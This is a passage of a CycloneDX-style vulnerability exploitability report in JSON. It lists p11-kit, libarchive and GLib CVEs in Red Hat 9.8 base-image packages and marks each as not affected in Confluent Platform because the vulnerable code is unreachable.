          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-13757",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "A flaw was found in p11-kit. The RPC message attribute parsing functions p11_rpc_message_get_attribute() and p11_rpc_message_get_attribute_array_value() form a mutually-recursive call chain with no recursion depth limit when processing nested CKA_WRAP_TEMPLATE, CKA_UNWRAP_TEMPLATE, and CKA_DERIVE_TEMPLATE attributes. An unauthenticated attacker with local access to the p11-kit RPC Unix domain socket can send a specially crafted request with deeply nested template attributes, causing stack exhaustion and crashing the p11-kit server process and its dependent services.",
      "recommendation": "Upgrade p11-kit to version 0.26.4-1.el9_8; Upgrade p11-kit-trust to version 0.26.4-1.el9_8",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-13757"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37469"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:38342"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49667"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49668"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53371"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54387"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54760"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-13757"
        },
        {
          "url": "https://bugzilla.redhat.com/2494556"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2494556"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-13757"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-49667.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:49668"
        },
        {
          "url": "https://github.com/advisories/GHSA-p2wm-69qx-x25w"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-13757.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-49668.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13757"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-13757"
        }
      ],
      "published": "2026-06-29T19:16:40+00:00",
      "updated": "2026-08-13T21:17:40+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.26.2-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.26.2-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-14164",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        415
      ],
      "description": "A double free issue has been identified in libarchive's RAR5 reader. During parsing of a specially crafted RAR5 archive, the filtered_buf pointer may remain stale after being freed during unpacking state reinitialization. Subsequent processing of another archive entry can trigger a second free of the same memory region, resulting in a double-free condition. Successful exploitation may cause applications using the vulnerable libarchive API to terminate unexpectedly, leading to a denial of service.",
      "recommendation": "Upgrade libarchive to version 3.5.3-11.el9_8",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-14164"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30333"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:52674"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:52675"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54387"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54760"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54769"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-14164"
        },
        {
          "url": "https://bugzilla.redhat.com/2493411"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2493411"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-14164"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-52674.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:52675"
        },
        {
          "url": "https://github.com/libarchive/libarchive/issues/3069"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/3071"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-14164.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-52675.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14164"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8581-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-14164"
        }
      ],
      "published": "2026-06-30T07:16:32+00:00",
      "updated": "2026-08-18T15:16:48+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-1484",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A flaw was found in the GLib Base64 encoding routine when processing very large input data. Due to incorrect use of integer types during length calculation, the library may miscalculate buffer boundaries. This can cause memory writes outside the allocated buffer. Applications that process untrusted or extremely large Base64 input using GLib may crash or behave unpredictably.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1484"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1484"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1484"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433259"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.5.0/BRSA-quby27cpefwz.toml"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3870"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1484"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8017-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1484"
        }
      ],
      "published": "2026-01-27T14:15:56+00:00",
      "updated": "2026-06-17T10:15:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-1485",
      "ratings": [
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        124
      ],
      "description": "A flaw was found in Glib's content type parsing logic. This buffer underflow vulnerability occurs because the length of a header line is stored in a signed integer, which can lead to integer wraparound for very large inputs. This results in pointer underflow and out-of-bounds memory access. Exploitation requires a local user to install or process a specially crafted treemagic file, which can lead to local denial of service or application instability.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1485"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1485"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1485"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433325"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.5.0/BRSA-hui7k8rsmbsl.toml"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3871"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1485"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8017-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1485"
        }
      ],
      "published": "2026-01-27T14:15:56+00:00",
      "updated": "2026-06-17T10:15:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-1489",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A flaw was found in GLib. An integer overflow vulnerability in its Unicode case conversion implementation can lead to memory corruption. By processing specially crafted and extremely large Unicode strings, an attacker could trigger an undersized memory allocation, resulting in out-of-bounds writes. This could cause applications utilizing GLib for string conversion to crash or become unstable.",
      "advisories": [
        {
